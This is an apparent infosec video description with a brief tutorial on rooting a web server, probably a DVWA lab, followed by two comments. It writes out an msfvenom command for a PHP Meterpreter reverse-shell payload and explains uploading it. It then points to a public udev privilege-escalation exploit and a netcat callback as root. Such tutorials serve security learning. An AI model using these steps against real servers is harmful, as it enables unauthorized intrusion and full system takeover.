Description: Hey my friends today I made a small tutorial on rooting a web server using metasploit. I hope you know to create metasploit backdoor executables. Here we use the same theory but our payload is php/meterpreter_reverse_tcp. As we need a back connection to our PC we use a reverse connection. So the parameter should be like this.
msfvenom –p php/meterpreter_reverse_tcp LHOST=[ local IP ] LPORT=[Local Port ] –f raw
We need a raw output so we use the format as raw. Now our php meterpreter reverse connection is created but you have to delete the ‘#’ character at the line 1 to run this script correctly. Okay now run msfconsole and use exploit/multi/handler with the LHOST and LPORT and exploit. Here in this video I have used msfcli which is the same but has advanced features automation features of metasploit. By now our framework should start listening. Next upload our php script to the server and load it.
Yeah, you should get a successful meterpreter session opened. We cannot use all the meterpreter commands as our payload is in php, hence we have limited meterpreter commands. Now run shell and there you go. As usual the normal procedure of compiling a local root exploit and executing can be done here. But in this example my kernel is 2.6.24-16 so I will use Linux 2.6 Udev Local Privilege Escalation Exploit http://www.exploit-db.com/exploits/8572/ . We should run this exploit like this
./exploit PID of Udev-1
Next after successful exploitation our payload in /tmp/run will be executed as root, so in this case I will be using a simple netcat back connection as my payload. That is it just listen using NC and you should get a successful back connection and you are the root.
Un0wn_X
Thank You.
Tags: metasploit , msfvenom , rooting , reverse connection , DVWA ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Nice Rooting Bro! Great tuto
Nice Keep It UP :D